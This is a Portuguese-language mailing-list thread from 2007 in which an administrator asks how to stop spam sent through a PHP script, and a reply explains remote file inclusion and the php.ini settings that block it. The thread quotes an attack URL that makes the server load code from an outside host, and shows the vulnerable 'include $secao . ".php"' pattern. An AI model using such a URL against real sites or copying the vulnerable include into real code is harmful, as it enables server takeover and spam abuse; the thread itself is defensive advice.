[MASOCH-L] Bloquear referência do tipo http no Apache

Roberto Berto roberto.berto at gmail.com
Thu Apr 19 13:02:34 -03 2007


O problema é que realizam injecao de codigo PHP atraves do include ou
do require. Em alguma linha do xyz.php do exemplo deve haver algo como

include $secao . ".php";

Ai basta abrir:
http://www.meudominio.com.br/xyz.php?end=http://www.geocities.com/xxxxerole/good.txt?

E o conteudo do http://www.geocities.com/xxxxerole/good.txt sera
interpretado como codigo PHP.


 No PHP4 a solucao nao é muito boa, pois o bloqueio ocorrera tanto
para o include, require, quanto para o fopen, o que pode impedir
alguns usos legitimos e necessarios dos clientes, neste caso eles
podem usar bibliotecas do PEAR ou mesmo a extensao CURL.

Para resolver, edite o php.ini e coloque allow_url_fopen = Off



No PHP5 fizeram uma melhoria e agora é possível impedir URL em require
e includes, colocando no php.ini:
allow_url_include = Off


Tomar uma dessas atitudes ou bloquear acesso saida pela porta 80 é
essencial para a seguranca minima de um sistema com PHP

O fato é que existem bots na internet procurando vulnerabilidades em
sites e por isso qualquer site que tiver essa vulnerabilidade ou mesmo
possibilitar injecao de header na funcao mail() do PHP (outra situacao
muito comum) podera ser encontrado e a vulnerabilidade um dia devera
ser explorada.

O ideal seria os programadores tomarem cuidado na programacao....



On 4/19/07, Diego Zuaneti Arruda <diego at fasternet.com.br> wrote:
>   Boa tarde,
>
>    Pessoal estou tendo problemas de SPAMs em um servidor apache, onde o spammer está utilizando da seguinte maneira para enviar SPAM.
>
> http://www.meudominio.com.br/xyz.php?end=http://www.geocities.com/xxxxerole/good.txt
>
>    Gostaria de saber se há como eu bloquear qualquer tentativa quando se referir a http*, ou seja, sempre que tentarem utilizar alguma váriavel apontando para um servidor http fosse bloqueado.
>
>    Há alguma maneira de fazer isso ?
>
>
>
>
> Obrigado,
> Diego Zuaneti Arruda
> __
> masoch-l list
> https://eng.registro.br/mailman/listinfo/masoch-l
>



-- 
Atenciosamente,

----------------------------------------------------------
Roberto Bertó


More information about the masoch-l mailing list